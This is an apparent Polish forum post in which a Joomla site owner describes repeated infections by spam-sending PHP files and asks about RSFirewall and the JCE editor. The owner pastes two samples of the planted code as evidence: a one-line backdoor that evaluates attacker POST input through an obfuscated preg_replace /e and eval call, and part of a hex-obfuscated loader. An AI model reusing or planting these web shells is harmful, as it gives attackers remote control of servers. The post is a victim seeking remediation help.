Słuchajcie, od jakiegoś czasu mam problem ze stronami postawionymi na Joomli - a działam na niej ponad 3 lata.

Na początku września administartor hostongu zgłosił mi informację że plik o nazwie user84.php zagnieżdżony w randomowym folderu wysyła spam.
Plik oraz inne podejrzane (te które pojawiły się między datą aktualizacji a datą wykrycia ataku) pliki usunąłem.

Teraz sytauacja pojawiła się znowu, znów pojawił się plik tym razem user42.php w innej witrynie którą mam na Joomli, na zupełnie innym szablonie.

Pytanie 1, czy po ręcznym usunięciu plików, mogę zainstalować jakiś płatny component (np. RSFirewall) który będzie pilnował porządku, względnie informował o jakichś podejrzanych akcjach?

Pytanie 2, czy udsotępnianie edytor JCE - osobom które uzupełniają treść strony jest dobrym pomysłem? Na tej pierwszej stronie, spotkałem się z sytacją że były wgrywane całe pliki z worda, to chyba słaby pomysł?

Pliki z dziwnymi nadpisaniami (nazywają się np.:sort-47.php albo backup-90.php albo aJnkurDn.php porozrzucane po całym serwisie)

Przykładowa treść:
<?php if($_GET['test']){echo 'success';}else{($www= $_POST['f6q46']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}

albo:
<?php $GLOBALS['ve03'] = "\x2b\x42\x7b\x52\x5a\x6d\x76\x2a\x79\x74\x4f\xd\x 28\x31\x26\x51\x50\x2d\x46\x21\x54\x60\x45\x55\x36 \x7a\x5d\x37\x72\x4c\x23\x4e\x22\x5e\x34\x2f\x6e\x 75\x59\x44\x9\x53\x61\x39\x41\x3d\x77\x3b\x43\x56\ x24\x5f\x4d\x6b\x38\x2c\x3a\x40\x6f\x3e\x7d\x6c\x6 8\xa\x70\x5c\x5b\x47\x30\x27\x7c\x67\x33\x63\x29\x 62\x65\x20\x4b\x3f\x57\x35\x2e\x71\x48\x6a\x78\x25 \x58\x69\x32\x66\x4a\x7e\x3c\x64\x73\x49";
$GLOBALS[$GLOBALS['ve03'][95].$GLOBALS['ve03'][43].$GLOBALS['ve03'][34].$GLOBALS['ve03'][72].$GLOBALS['ve03'][54].$GLOBALS['ve03'][81].$GLOBALS['ve03'][42]] = $GLOBALS['ve03'][73].$GLOBALS['ve03'][62].$GLOBALS['ve03'][28];



Zaobserowałem ostatnio nasilenie takich akcji, czy ktoś ma na to receptę?